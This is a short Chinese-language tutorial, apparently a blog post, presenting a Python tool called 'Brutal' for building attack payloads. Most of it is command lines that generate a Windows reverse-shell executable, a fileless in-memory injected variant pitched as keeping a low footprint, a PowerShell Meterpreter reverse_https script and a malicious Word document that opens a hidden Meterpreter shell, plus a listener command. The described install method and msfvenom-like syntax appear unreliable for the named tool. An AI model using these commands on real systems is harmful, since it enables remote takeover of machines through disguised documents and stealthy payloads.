Brutal - 创造各种有效负载、PowerShell、病毒攻击和启动侦听器

Brutal 是一个用 Python 编写的工具，旨在帮助渗透测试人员和红队员创造各种有效负载、PowerShell 攻击、病毒攻击和启动侦听器。使用 Brutal，您可以快速创建各种攻击，以测试目标系统的安全性。

安装

您可以使用 pip 安装 Brutal，命令如下：

pip install brutal

基本用法

使用 Brutal，您可以创建各种有效负载和攻击。例如，以下命令将创建一个反向 shell，以连接到您的监听器：

brutal payloads windows/shell_reverse_tcp LHOST=<your IP> LPORT=<your port> --output reverse_shell.exe

此命令将创建一个名为 reverse_shell.exe 的 PE 可执行文件，该文件将连接到您的 IP 和端口，以便您可以与目标系统交互。您还可以将此有效负载设置为“无文件”模式，以将其存储在内存中，而不是在磁盘上创建文件：

brutal payloads windows/shell_reverse_tcp LHOST=<your IP> LPORT=<your port> --no-output --inject

此命令将创建一个与先前命令相同的有效负载，但它将在内存中创建有效负载，而不是在磁盘上创建文件。这可帮助您在目标系统上保持低痕迹性。

您还可以使用 Brutal 创建 PowerShell 攻击：

brutal payloads powershell/meterpreter/reverse_https LHOST=<your IP> LPORT=<your port> --output reverse_https.ps1

此命令将创建一个 PowerShell 脚本，该脚本将连接到您的监听器，以寻求远程 shell。您可以在目标系统上运行此脚本，以建立与您的监听器的连接。

Brutal 还支持创建各种病毒攻击，例如恶意文档和 PDF 文件：

brutal payloads windows/meterpreter/reverse_https LHOST=<your IP> LPORT=<your port> --document --output malicious_document.docx

此命令将创建一个恶意的 Word 文档，该文档将启动一个隐藏的 Meterpreter shell，并连接到您的监听器。

最后，您可以使用 Brutal 创建启动侦听器的监听器，例如 Meterpreter、反向 shell 或 VNC：

brutal listeners meterpreter/reverse_https LHOST=<your IP> LPORT=<your port>

此命令将启动一个 Meterpreter 反向监听器，以便目标系统连接到您的监听器。

结论

使用 Brutal，您可以快速创建各种有效负载、PowerShell 攻击、病毒攻击和启动侦听器。此工具可帮助您加快渗透测试和红队操作的速度，并帮助您识别目标系统上的安全漏洞。